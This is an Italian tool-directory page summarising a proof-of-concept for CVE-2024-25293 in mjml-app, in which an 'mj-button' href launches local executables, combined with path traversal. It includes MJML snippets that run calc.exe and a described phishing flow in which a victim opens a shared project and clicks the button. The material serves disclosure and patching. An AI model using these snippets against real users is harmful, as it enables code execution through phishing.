Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25293 — mjml-app v3.0.4 & 3.1.0-beta exploit RCE | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2024-25293
Strumenti di PhishingGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebConfigurazione Errata
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 & 3.1.0-beta exploit RCE

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC di esecuzione locale di codice MJML

Una Proof-of-Concept per la vulnerabilità CVE-2024-25293.

È stato scoperto che mjml-app v3.0.4 e 3.1.0-beta presentano una vulnerabilità di remote code execution (RCE). In questo repository è presente un esempio di applicazione vulnerabile e un exploit proof-of-concept (POC) della stessa.

Come PoC è presente un file python che automatizza il processo.

1.Panoramica della vulnerabilità:

  • Oggetto della vulnerabilità: Esecuzione locale di codice
  • Versione vulnerabile: mjml-app 3.0.4-win & mjml-app 3.1.0-beta
  • Tipo di attacco: Remote Code Execution
  • Componente attaccato: Nel tag 'mj-button' all'interno del file di codice sorgente interessato, l'attributo 'href' consente l'esecuzione locale di codice.
  • Numero CVE riservato: CVE-2024-25293

2. Causa della vulnerabilità:

  • mjml-app 3.0.4-win e mjml-app 3.1.0-beta soffre di una errata configurazione della sicurezza nel tag 'mj-button', che può comportare l'esecuzione arbitraria di codice.
  • Spiegazione dell'exploit
    • L'esecuzione di file locali tramite i tag di evento nelle applicazioni mjml rappresenta una minaccia per la sicurezza. Inoltre, il codice può essere eseguito combinando Path Traversal all'interno dell'applicazione, richiedendo una patch. image

Prova di concetto (POC)

Passo 1) L'attaccante crea un 'mj-button' con un tag 'href' e

  • caso 1) Esecuzione di codice con Path Traversal (notepad.exe)
  • caso 2) Esecuzione di codice (calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

Passo 2) L'attaccante crea il progetto di phishing principale con il seguente codice.

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

Passo 3) La vittima apre il progetto condiviso e fa clic sul pulsante, attivando l'esecuzione del payload (ad es. calc, notepad) mjml3


3. Informazioni aggiuntive

Eseguire file exe tramite tag href all'interno di un'applicazione è rischioso, ed eseguire file in combinazione con Path Traversal rappresenta un problema di sicurezza. Ciò consente di creare e distribuire progetti di phishing per eseguire file locali. Pertanto, è essenziale modificare questa funzionalità per impedire tale esecuzione.

Scarica lo strumento